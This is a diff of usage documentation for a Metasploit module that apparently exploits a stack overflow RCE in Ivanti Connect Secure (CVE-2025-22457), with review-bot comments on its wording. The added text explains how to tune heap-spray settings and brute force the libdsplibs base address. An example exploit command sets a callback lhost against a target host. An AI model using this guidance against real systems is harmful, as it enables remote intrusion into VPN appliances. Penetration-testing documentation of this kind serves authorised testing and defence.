@@ -41,6 +41,18 @@ The number of `/home/bin/web` child processes the server uses. It's been
41
41
observed that the number of children the main process forks is directly related
42
42
to the number of vCPUs used by the system. Ivanti recommends having 4 vCPUs, so
43
43
the default number of children is set to 4.
44
+ Note that this option should be set properly, since the exploit needs to send enough
45
+ spray patterns to fill the memory of each child process. This is mandatory,
46
+ since we don’t control which child process will be used to trigger the
47
+ vulnerability. If we send too much data, the process memory will overflow and
48
+ the process will crash. A ` Broken pipe ` socket error will happen in this case.
49
+ So, if the number of ` WEB_CHILDREN ` is too low (< vCPUs), we might not send
50
+ enough data to fill the memory of every child process and the exploit would
51
+ likely fail. This scenario cannot be detected since the child processes should
52
+ not crash. The module will simply continue to brute force with a different base
53
+ address of ` libdsplibs ` , without detecting the real issue. On the other hand,
54
+ if we send too much data, the child processes will crash and we will need to
55
+ start everything again with a lower ` WEB_CHILDREN ` value.
44
56
45
57
### LIBDSPLIBS_ADDRESS
46
58
The base address of libdsplibs that the module will start with when brute
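Review bot: the added WEB_CHILDREN paragraph describes the crash case twice, once in "If we send too much data, the process memory will overflow and the process will crash" and again in the closing "On the other hand, if we send too much data, the child processes will crash", so the two failure modes are hard to tell apart on first read. Suggest splitting it into two explicit cases: a value that is too low, where the module keeps brute forcing `libdsplibs` base addresses with no visible error, and a value that is too high, where the children crash and the `Broken pipe` socket error appears. The condition "(< vCPUs)" is also loose, because the unchanged text above only says the child count is "directly related" to the number of vCPUs; consider wording it relative to the number of child processes instead. Minor style point: "don’t" uses a typographic apostrophe while the surrounding text uses plain ASCII ("It's").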
@@ -57,7 +69,7 @@ The number of attempts to brute force the base address of libdsplibs (default: 2
57
69
58
70
### Ivanti Connect Secure version 22.7r2.4 b3597
59
71
60
- In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPU's .
72
+ In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPUs .
61
73
62
74
```
63
75
msf6 exploit(linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457) > exploit verbose=true lhost=192.168.222.97 rhosts=192.168.222.222 libdsplibs_address=0xf64c1000 web_children=2
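Review bot: the corrected sentence mentions that the target runs with 2 vCPUs but never connects that to the `web_children=2` option used in the command below it, so the reader has to infer why the value is there. Suggest saying so directly, for example by ending the sentence with "so `WEB_CHILDREN` is set to 2". While touching this line, "the address of libdsplibs is known to speed up the process" reads as if the address itself speeds things up; "is already known, which speeds up the process" would be clearer. The stray space before the final period ("vCPUs .") should be dropped if it is present in the source file and not a rendering effect.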